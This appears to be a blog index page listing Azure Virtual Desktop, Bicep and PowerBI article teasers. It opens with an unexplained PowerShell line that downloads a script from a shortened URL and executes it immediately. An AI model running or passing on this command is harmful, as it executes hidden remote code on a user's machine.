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iex (New-Object Net.WebClient).DownloadString(“http://bit.ly/e0Mw9w”)
Monitoring Azure Virtual Desktop with eG Enterprise
Monitoring Azure Virtual Desktop with eG Enterprise
Why Azure Virtual Desktop, and why today?
Freek Berson
May 11, 2022
Empowering AVD Image deployments with Azure Pipelines, Bicep and Liquit!
Empowering AVD Image deployments with Azure Pipelines, Bicep and Liquit!
In any Cloud implementation, automation is key in becoming successful. Azure Virtual Desktop (AVD) is no different. AVD is a service in…
Freek Berson
Nov 17, 2021
Multimedia redirection for Azure Virtual Desktop preview
Multimedia redirection for Azure Virtual Desktop preview
Last week the public preview of Multimedia redirection (MMR) for Azure Virtual Desktop was announced! MMR provides the user with a very…
Freek Berson
Aug 22, 2021
PowerBI : Deployment of Datasets and Reports with Azure DevOps Pipelines
PowerBI : Deployment of Datasets and Reports with Azure DevOps Pipelines
Not so long ago we finished a long-running project at a customer where we made use of the combination of Azure SQL Server and PowerBI…
Jos Eilers
Jul 29, 2021
New book: ‘Getting started with Bicep’ now available!
New book: ‘Getting started with Bicep’ now available!
Happy to announce my new book: Getting started with Bicep : Infrastructure as code is now available on Amazon both in kindle and paper…
Freek Berson
Jul 12, 2021
E-book: Windows Virtual Desktop Handbook: Security Fundamentals
E-book: Windows Virtual Desktop Handbook: Security Fundamentals
I have authored a new e-book which focusses on all the security aspects of Windows Virtual Desktop. Find out how to secure your Windows…
Freek Berson
Apr 22, 2021
Bicep code snippets for WVD!
Bicep code snippets for WVD!
Yesterday, a couple of code snippets I contributed to Bicep 💪, were merged in the latest Bicep CLI version 0.3.310! Super cool to see…
Freek Berson
Apr 15, 2021
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